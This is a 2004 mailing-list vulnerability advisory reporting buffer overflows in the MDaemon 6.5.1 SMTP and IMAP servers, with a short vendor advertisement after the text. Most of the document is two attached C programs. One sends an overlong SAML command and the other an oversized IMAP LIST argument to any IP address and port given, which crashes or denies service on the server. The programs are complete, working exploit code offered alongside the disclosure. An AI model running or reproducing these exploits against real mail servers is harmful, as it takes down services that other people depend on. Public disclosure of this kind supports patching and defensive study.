Remote buffer overflow in MDaemon IMAP and SMTP server
Date: Wed, 22 Sep 2004 23:08:16 +0400
From: pigrelax <[email protected]>
To: [email protected]
Subject: Remote buffer overflow in MDaemon IMAP and SMTP server
This is a multi-part message in MIME format.
------=_NextPart_000_002C_01C4A0F9.0B3EEA70
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Buffer overflow in MDaemon 6.5.1 in SAML, SOML, SEND, MAIl command in SMTP
server and in LIST command in IMAP server.
More information (In Russian!): http://www.securitylab.ru/48146.html
----------------------------------------------------------------------------
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com
------=_NextPart_000_002C_01C4A0F9.0B3EEA70
Content-Type: application/octet-stream;
name="mdaemon_rcpt.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="mdaemon_rcpt.c"
/////////////////////////////////////////////////////////////=0A=
// Remote DoS and proof-of-concept exploit //=0A=
// for //=0A=
// Mdaemon smtp server v6.5.1 //=0A=
// and //=0A=
// possible other version. //=0A=
// Find bug: D_BuG. //=0A=
// Author: D_BuG. //=0A=
// [email protected] // =0A=
// Data: 16/09/2004 //=0A=
// NOT PUBLIC! //=0A=
// Greets:Rasco. // =0A=
/////////////////////////////////////////////////////////////=0A=
=0A=
#include <stdio.h>=0A=
#include <stdlib.h>=0A=
#include <sys/types.h>=0A=
#include <unistd.h>=0A=
#include <sys/socket.h>=0A=
#include <netinet/in.h>=0A=
=0A=
int sock,err;=0A=
struct sockaddr_in sa;=0A=
=0A=
=0A=
int main (int argc, char *argv[])=0A=
=0A=
{=0A=
=0A=
printf("Remote DoS and proof-of-concept(buffer overflow) exploit\n");=0A=
printf(" for \n");=0A=
printf("Mdaemon smtp server v6.5.1 and possible other version.\n"); =
=0A=
if(argc!=3D4)=0A=
{=0A=
printf("Usage: %s <IPADDRESS> <PORT> <TARGET>\n",argv[0]);=0A=
printf("Target:\n1.DoS.\n2.Proof-of-concept(buffer overflow).\n");=0A=
printf("e.g.:%s 192.168.1.1 25 1\n",argv[0]);=0A=
exit(-1);=0A=
}=0A=
=0A=
=0A=
sa.sin_family=3DAF_INET;=0A=
sa.sin_port=3Dhtons(atoi(argv[2]));=0A=
if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <=3D 0)=0A=
printf("Error inet_pton\n");=0A=
=0A=
sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP);=0A=
=0A=
printf("[~]Connecting...\n");=0A=
=0A=
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)=0A=
{=0A=
printf("[-]Connect filed....\nExit...\n");=0A=
exit(-1);=0A=
}=0A=
=0A=
int len=3D247;=0A=
=0A=
if(atoi(argv[3])=3D=3D2)=0A=
{=0A=
len++;=0A=
}=0A=
=0A=
char szBuffer[len+7];=0A=
char buff[len];=0A=
char send[]=3D"EHLO tester\n";=0A=
char send3[]=3D"RCPT TO postmaster\n";=0A=
char rcv[1024];=0A=
int i;=0A=
for(i=3D0;i<len;i++)=0A=
{=0A=
buff[i]=3D0x41;=0A=
}=0A=
=0A=
sprintf(szBuffer,"SAML %s\n",buff);=0A=
=0A=
printf("[+]Ok!\n");=0A=
sleep(2);=0A=
printf("[~]Get banner...\n");=0A=
if(read(sock,&rcv,sizeof(rcv)) !=3D-1){}=0A=
=0A=
if(strstr(rcv,"220")=3D=3DNULL)=0A=
{=0A=
printf("[-]Failed!\n");=0A=
}=0A=
else=0A=
{ =0A=
printf("[+]Ok!\n");=0A=
}=0A=
=0A=
printf("[~]Send EHLO...\n");=0A=
write(sock,send,sizeof(send)-1);=0A=
sleep(2);=0A=
memset(rcv,0,1024);=0A=
if(read(sock,&rcv,sizeof(rcv)) !=3D-1){}=0A=
=0A=
if(strstr(rcv,"250")=3D=3DNULL)=0A=
{=0A=
printf("[-]Failed...\n");=0A=
}=0A=
else=0A=
{=0A=
printf("[+]Ok!\n");=0A=
}=0A=
printf("[~]Send SAML...\n");=0A=
write(sock,szBuffer,strlen(szBuffer));//Send SAML=0A=
sleep(2);=0A=
memset(rcv,0,1024);=0A=
if(read(sock,&rcv,sizeof(rcv)) !=3D-1){}=0A=
=0A=
if(strstr(rcv,"250")=3D=3DNULL)=0A=
{=0A=
printf("[-]Exploit failed...please check your version Mdaemon!\n");=0A=
printf("[-]Exit...\n");=0A=
exit(-1);=0A=
}=0A=
printf("[+]Ok!\n");=0A=
=0A=
printf("[~]Send RCPT...\n\n");=0A=
write(sock,send3,sizeof(send3)-1);//Send RCPT=0A=
sleep(2);=0A=
if(atoi(argv[3])=3D=3D2)=0A=
{=0A=
printf("[+]Crash service.....\n");=0A=
}=0A=
else=0A=
{=0A=
printf("[+]DoS service.....\n");=0A=
}=0A=
printf("[~]Done.\n");=0A=
=0A=
close(sock);=0A=
=0A=
return 0;=0A=
=0A=
}
------=_NextPart_000_002C_01C4A0F9.0B3EEA70
Content-Type: application/octet-stream;
name="mdaemon_imap.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="mdaemon_imap.c"
/////////////////////////////////////////////////////////////=0A=
// Remote proof-of-concept exploit //=0A=
// for //=0A=
// Mdaemon IMAP server v6.5.1 //=0A=
// and //=0A=
// possible other version. //=0A=
// Find bug: D_BuG. //=0A=
// Author: D_BuG. //=0A=
// [email protected] // =
=0A=
// Data: 16/09/2004 //=0A=
// NOT PUBLIC! //=0A=
// // =0A=
/////////////////////////////////////////////////////////////=0A=
=0A=
#include <stdio.h>=0A=
#include <stdlib.h>=0A=
#include <sys/types.h>=0A=
#include <unistd.h>=0A=
#include <sys/socket.h>=0A=
#include <netinet/in.h>=0A=
=0A=
int sock,err;=0A=
struct sockaddr_in sa;=0A=
=0A=
=0A=
int main (int argc, char *argv[])=0A=
=0A=
{=0A=
=0A=
printf("Remote proof-of-concept(buffer overflow) exploit\n");=0A=
printf(" for \n");=0A=
printf("Mdaemon IMAP server v6.5.1 and possible other version.\n"); =
=0A=
if(argc!=3D3)=0A=
{=0A=
printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);=0A=
printf("e.g.:%s 192.168.1.1 143\n",argv[0]);=0A=
exit(-1);=0A=
}=0A=
=0A=
=0A=
sa.sin_family=3DAF_INET;=0A=
sa.sin_port=3Dhtons(atoi(argv[2]));=0A=
if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <=3D 0)=0A=
printf("Error inet_pton\n");=0A=
=0A=
sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP);=0A=
=0A=
printf("[~]Connecting...\n");=0A=
=0A=
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)=0A=
{=0A=
printf("[-]Connect filed....\nExit...\n");=0A=
exit(-1);=0A=
}=0A=
=0A=
=0A=
char send[]=3D"0001 LOGIN ""test"" ""console""\r\n";=0A=
char send3[]=3D=0A=
"007x LIST "=0A=
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaAAAA"""=0A=
""" =
*BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAc"""=0A=
"\r\n\r\n";=0A=
char rcv[1024];=0A=
=0A=
=0A=
printf("[+]Ok!\n");=0A=
sleep(2);=0A=
printf("[~]Get banner...\n");=0A=
if(read(sock,&rcv,sizeof(rcv)) !=3D-1){}=0A=
=0A=
if(strstr(rcv,"IMAP")=3D=3DNULL)=0A=
{=0A=
printf("[-]Failed!\n");=0A=
}=0A=
else=0A=
{ =0A=
printf("[+]Ok!\n");=0A=
}=0A=
=0A=
printf("[~]Send LOGIN and PASSWORD...\n");=0A=
write(sock,send,sizeof(send)-1);=0A=
sleep(2);=0A=
memset(rcv,0,1024);=0A=
if(read(sock,&rcv,sizeof(rcv)) !=3D-1){}=0A=
=0A=
if(strstr(rcv,"OK")=3D=3DNULL)=0A=
{=0A=
printf("[-]Failed login or password...\nExit...");=0A=
exit(-1);=0A=
}=0A=
=0A=
printf("[+]Ok!\n");=0A=
=0A=
printf("[~]Send LIST...\n");=0A=
write(sock,send3,sizeof(send3)-1);=0A=
sleep(2);=0A=
memset(rcv,0,1024);=0A=
if(read(sock,&rcv,sizeof(rcv)) !=3D-1){}=0A=
=0A=
if(strstr(rcv,"BAD")!=3DNULL)=0A=
{=0A=
printf("[-]Exploit filed...please check your version Mdaemon!\n");=0A=
printf("[-]Exit...\n");=0A=
exit(-1);=0A=
}=0A=
printf("[+]Ok!\n");=0A=
printf("[+]Crash service.....\n");=0A=
printf("[~]Done.\n");=0A=
=0A=
close(sock);=0A=
=0A=
return 0;=0A=
=0A=
}
------=_NextPart_000_002C_01C4A0F9.0B3EEA70--
